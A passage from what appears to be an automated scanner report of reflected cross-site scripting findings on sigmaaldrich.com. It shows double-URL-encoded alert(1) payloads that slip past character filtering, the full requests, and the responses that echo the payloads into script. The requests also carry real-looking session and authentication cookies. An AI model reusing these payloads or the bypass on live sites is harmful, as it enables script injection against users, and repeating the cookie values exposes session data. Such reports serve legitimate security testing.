Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28903
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/4ed07";alert(1)//58c74c259d","E404") ;
   </script>
...[SNIP]...

1.585. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/biomaterials.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b136b%2522%253balert%25281%2529%252f%252f212c8359466 was submitted in the REST URL parameter 1. This input was echoed as b136b";alert(1)//212c8359466 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceb136b%2522%253balert%25281%2529%252f%252f212c8359466/biomaterials.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceb136b";alert(1)//212c8359466/biomaterials.html","E404") ;
   </script>
...[SNIP]...

1.586. http://www.sigmaaldrich.com/materials-science/biomaterials.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/biomaterials.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fb90%2522%253balert%25281%2529%252f%252ffece847e065 was submitted in the REST URL parameter 2. This input was echoed as 4fb90";alert(1)//fece847e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/4fb90%2522%253balert%25281%2529%252f%252ffece847e065 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:44 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/4fb90";alert(1)//fece847e065","E404") ;
   </script>
...[SNIP]...

1.587. http://www.sigmaaldrich.com/materials-science/learning-center.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/learning-center.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1488a%2522%253balert%25281%2529%252f%252f8bb7f56ba82 was submitted in the REST URL parameter 1. This input was echoed as 1488a";alert(1)//8bb7f56ba82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science1488a%2522%253balert%25281%2529%252f%252f8bb7f56ba82/learning-center.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:49 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science1488a";alert(1)//8bb7f56ba82/learning-center.html","E404") ;
   </script>
...[SNIP]...

1.588. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/material-science-products.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ef01%2522%253balert%25281%2529%252f%252fa4fe8ce1084 was submitted in the REST URL parameter 1. This input was echoed as 1ef01";alert(1)//a4fe8ce1084 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science1ef01%2522%253balert%25281%2529%252f%252fa4fe8ce1084/material-science-products.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28952
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science1ef01";alert(1)//a4fe8ce1084/material-science-products.html","E404") ;
   </script>
...[SNIP]...

1.589. http://www.sigmaaldrich.com/materials-science/material-science-products.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/material-science-products.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dda9b%2522%253balert%25281%2529%252f%252ffe8e88d2785 was submitted in the REST URL parameter 2. This input was echoed as dda9b";alert(1)//fe8e88d2785 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/dda9b%2522%253balert%25281%2529%252f%252ffe8e88d2785 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; 